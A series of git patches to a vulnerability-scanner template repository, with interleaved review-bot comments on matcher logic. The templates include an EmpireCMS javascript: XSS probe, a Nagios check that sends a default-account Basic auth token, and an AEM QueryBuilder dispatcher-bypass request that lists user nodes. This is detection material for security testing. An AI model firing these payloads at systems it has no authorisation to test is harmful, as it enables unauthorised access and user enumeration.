From 9057a617e4359684b50229f5fcc24a457deb35f2 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 5 Apr 2021 00:04:52 +0000 Subject: [PATCH 01/13] Update general-tokens.yaml proposed fix for false positives related to the presence of `keyup`, `keydown`, and `keypress` in the response body. --- exposed-tokens/generic/general-tokens.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml index db7cff9ef8..1c51bc28d4 100644 --- a/exposed-tokens/generic/general-tokens.yaml +++ b/exposed-tokens/generic/general-tokens.yaml @@ -2,7 +2,7 @@ id: generic-tokens info: name: Generic Tokens - author: nadino + author: nadino & geeknik severity: info tags: token @@ -12,6 +12,11 @@ requests: - '{{BaseURL}}' matchers-condition: and matchers: + - type: regex + part: body + regex: + - (K|k)ey(up|down|press) + negativee: true - type: dsl dsl: - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) From d12e30354e192bc1bf11bd8ae3a0613b396632e7 Mon Sep 17 00:00:00 2001 From: Chintan Gurjar Date: Mon, 5 Apr 2021 05:10:34 +0100 Subject: [PATCH 02/13] create nagios-default-creds.yaml --- .../nagios/nagios-default-creds.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 default-logins/nagios/nagios-default-creds.yaml diff --git a/default-logins/nagios/nagios-default-creds.yaml b/default-logins/nagios/nagios-default-creds.yaml new file mode 100644 index 0000000000..07c746c84a --- /dev/null +++ b/default-logins/nagios/nagios-default-creds.yaml 
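Review bot: The new negative regex matcher becomes a hard veto for the whole template, because `matchers-condition: and` means any response containing `keyup`, `keydown` or `keypress` (ordinary JavaScript key handlers, very common on real pages) now suppresses a genuine exposed-token hit instead of just the one false match. A narrower fix is to guard the token pattern itself inside the DSL regex so the keyword cannot be read as part of a token, rather than excluding entire pages. The casing is also inconsistent with the DSL: the token check runs on `toupper(body)`, so `KeyUp`/`KEYUP` produce the same false positive but are not caught by `(K|k)ey(up|down|press)`; `(?i)key(up|down|press)` would cover all casings. Note that the key is misspelled here (`negativee`), so the matcher is not negated at all until patch 04/13 renames it to `negative: true`.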
@@ -0,0 +1,29 @@ + +id: Nagios-default-credentials + +info: + name: Nagios Default Password + author: "@iamthefrogy" + severity: high + tags: nagios + +# Nagios Core formerly known as Nagios, is a free and open-source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved. +# An attacker can gain a lot of information about the infra from looking at the server status and logs. + +requests: + - method: GET + path: + - "{{BaseURL}}/nagios/side.php" + headers: + Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'Current Status' + - 'Reports' + condition: and From d789177b066f8cb579c928f957034eaa0703c7ca Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 5 Apr 2021 08:16:27 +0000 Subject: [PATCH 03/13] Create empirecms-xss.yaml --- vulnerabilities/other/empirecms-xss.yaml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/empirecms-xss.yaml diff --git a/vulnerabilities/other/empirecms-xss.yaml b/vulnerabilities/other/empirecms-xss.yaml new file mode 100644 index 0000000000..c47f4ad129 --- /dev/null +++ b/vulnerabilities/other/empirecms-xss.yaml @@ -0,0 +1,26 @@ +id: empirecms-xss + +info: + name: EmpireCMS v75 XSS + author: pikpikcu + severity: medium + reference: https://www.geek-share.com/detail/2777280260.html + tags: empirecms,xss + + +requests: + - method: GET + path: + - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(/1337/)" + + matchers-condition: and + matchers: + + - type: word + words: + - 'onmousewheel=\"return bbimg(this)\"' + condition: and + + - type: status + status: + - 200 
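Review bot: The matcher cannot tell "default credentials accepted" from "no authentication required": if `/nagios/side.php` is served without auth, the 200 plus the `Current Status`/`Reports` words still match and the result is reported as a default-login finding. A preceding request without the `Authorization` header (expecting a non-200) or a matcher on something only present after a successful login would separate the two cases; at minimum the limitation should be stated in the `info` block. The `Authorization` header carries the fixed Basic token for the documented default account, so the template is only meaningful while that value is documented next to it, e.g. `# Basic token for the vendor's documented default account` above the header.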
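Review bot: The word matcher asserts static page markup (`onmousewheel=\"return bbimg(this)\"`), not that the `url` parameter is reflected, so any EmpireCMS instance serving `/e/ViewImg/index.html` matches whether or not the injection lands; add a second word matcher on the reflected value (`'javascript:alert(document.domain)'` after patch 09/13) and keep `matchers-condition: and`. In a single-quoted YAML scalar `\"` is two literal characters, so this matcher looks for a backslash before each quote and only fires if the page embeds the attribute inside a JavaScript string — presumably the case, but confirm against a live response. Patch 09/13 changes the payload but leaves this matcher untouched.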
From cdf0da4cd8fa51820cbfc917425d0e911fe9b897 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:37:34 +0530 Subject: [PATCH 04/13] minor fix --- exposed-tokens/generic/general-tokens.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml index 1c51bc28d4..33df4a717b 100644 --- a/exposed-tokens/generic/general-tokens.yaml +++ b/exposed-tokens/generic/general-tokens.yaml @@ -16,7 +16,8 @@ requests: part: body regex: - (K|k)ey(up|down|press) - negativee: true + negative: true + - type: dsl dsl: - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) From 6a35e79f17e1943f83290477daba8e01bcb1f669 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:46:24 +0530 Subject: [PATCH 05/13] minor changes --- default-logins/nagios/nagios-default-creds.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/default-logins/nagios/nagios-default-creds.yaml b/default-logins/nagios/nagios-default-creds.yaml index 07c746c84a..998433526c 100644 --- a/default-logins/nagios/nagios-default-creds.yaml +++ b/default-logins/nagios/nagios-default-creds.yaml 
@@ -1,14 +1,11 @@ - -id: Nagios-default-credentials +id: nagios-default-credentials info: - name: Nagios Default Password - author: "@iamthefrogy" + name: Nagios Default Credentials Check + author: iamthefrogy severity: high - tags: nagios - -# Nagios Core formerly known as Nagios, is a free and open-source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved. -# An attacker can gain a lot of information about the infra from looking at the server status and logs. + tags: nagios,default-login + reference: https://www.nagios.org requests: - method: GET @@ -26,4 +23,4 @@ requests: words: - 'Current Status' - 'Reports' - condition: and + condition: and \ No newline at end of file From 46512a0e255a0e637f0326e6fd23eba92d87fa5c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:49:26 +0530 Subject: [PATCH 06/13] misc changes --- .../{nagios-default-creds.yaml => nagios-default-credential.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename default-logins/nagios/{nagios-default-creds.yaml => nagios-default-credential.yaml} (100%) diff --git a/default-logins/nagios/nagios-default-creds.yaml b/default-logins/nagios/nagios-default-credential.yaml similarity index 100% rename from default-logins/nagios/nagios-default-creds.yaml rename to default-logins/nagios/nagios-default-credential.yaml From 0b781b3e4437e247e42c2bf28e7a12cc425c927c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 16:20:29 +0000 Subject: [PATCH 07/13] Auto Update README [Mon Apr 5 16:20:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 246a72f744..aa5939a5f3 100644 --- a/README.md +++ b/README.md 
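Review bot: The second hunk changes nothing in `condition: and` except dropping the file's trailing newline (`\ No newline at end of file`), which yamllint flags and which makes the next edit of that line show up as a spurious diff; restore the final newline. The new `aem-jcr-querybuilder.yaml` in patch 12/13 has the same problem on its last line (`- 'jcr:uuid'`). The added `reference: https://www.nagios.org` points at the vendor home page rather than at documentation of the default account, so a more specific reference would help triage.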
@@ -40,10 +40,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 267 | vulnerabilities | 119 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | | misconfiguration | 55 | workflows | 26 | miscellaneous | 19 | -| default-logins | 20 | exposed-tokens | 9 | dns | 8 | +| default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**80 directories, 881 files**. +**81 directories, 882 files**. From 57650a8ed3f1bf89c7fc42a15f205af88d1a8d74 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:51:03 +0530 Subject: [PATCH 08/13] minor fix Removing unrelated template from workflow --- workflows/vbulletin-workflow.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index 0042ac8e58..ddf77dc573 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -17,5 +17,4 @@ workflows: - name: vbulletin subtemplates: - template: cves/2019/CVE-2019-16759.yaml - - template: cves/2019/CVE-2019-6340.yaml - template: cves/2020/CVE-2020-12720.yaml From e934241101620bb6855c823caf276ebdac6b6b29 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 22:13:16 +0530 Subject: [PATCH 09/13] Update empirecms-xss.yaml --- vulnerabilities/other/empirecms-xss.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/empirecms-xss.yaml b/vulnerabilities/other/empirecms-xss.yaml index c47f4ad129..9ccb638846 100644 --- a/vulnerabilities/other/empirecms-xss.yaml +++ b/vulnerabilities/other/empirecms-xss.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(/1337/)" + - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)" matchers-condition: and matchers: 
@@ -19,7 +19,6 @@ requests: - type: word words: - 'onmousewheel=\"return bbimg(this)\"' - condition: and - type: status status: From ed8359cf2a0f8f99bdae6efd2ebd7c3eaf65101c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 16:44:30 +0000 Subject: [PATCH 10/13] Auto Update README [Mon Apr 5 16:44:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index aa5939a5f3..09e1bea57c 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 267 | vulnerabilities | 119 | exposed-panels | 117 | +| cves | 267 | vulnerabilities | 120 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | | misconfiguration | 55 | workflows | 26 | miscellaneous | 19 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**81 directories, 882 files**. +**81 directories, 883 files**. From 3f954de84dcd8ddf02905892807e18537b21b18b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 17:08:45 +0000 Subject: [PATCH 11/13] Auto Update README [Mon Apr 5 17:08:45 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 09e1bea57c..10e7f18b89 100644 --- a/README.md +++ b/README.md 
@@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 267 | vulnerabilities | 120 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | -| misconfiguration | 55 | workflows | 26 | miscellaneous | 19 | +| misconfiguration | 54 | workflows | 26 | miscellaneous | 19 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**81 directories, 883 files**. +**82 directories, 884 files**. From 477a78379040e01a9bc40712a00ce71c1b69e371 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 22:45:48 +0530 Subject: [PATCH 12/13] Added aem-jcr-querybuilder --- .../aem/aem-jcr-querybuilder.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 misconfiguration/aem/aem-jcr-querybuilder.yaml diff --git a/misconfiguration/aem/aem-jcr-querybuilder.yaml b/misconfiguration/aem/aem-jcr-querybuilder.yaml new file mode 100644 index 0000000000..3dfcd291c4 --- /dev/null +++ b/misconfiguration/aem/aem-jcr-querybuilder.yaml 
@@ -0,0 +1,31 @@ +id: aem-jcr-querybuilder + +info: + author: DhiyaneshDk + name: Query JCR role via QueryBuilder Servlet + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' \ No newline at end of file From 8c3326b63bb1d28067545c6164d2f3081c81c847 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 17:16:09 +0000 Subject: [PATCH 13/13] Auto Update README [Mon Apr 5 17:16:09 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 10e7f18b89..87f815bb21 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 884 files**. +**82 directories, 885 files**.
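Review bot: The `words` matcher has no `condition: and`, so with nuclei's default `or` a response containing only `"success":true` satisfies it; a QueryBuilder JSON reply with zero hits still reports success and would be flagged. Add `condition: and` under the `words` list so both `"success":true` and `jcr:uuid` must be present. Given that a successful response lists `rep:User` nodes, `severity: info` may understate the finding — confirm against the project's severity guidance.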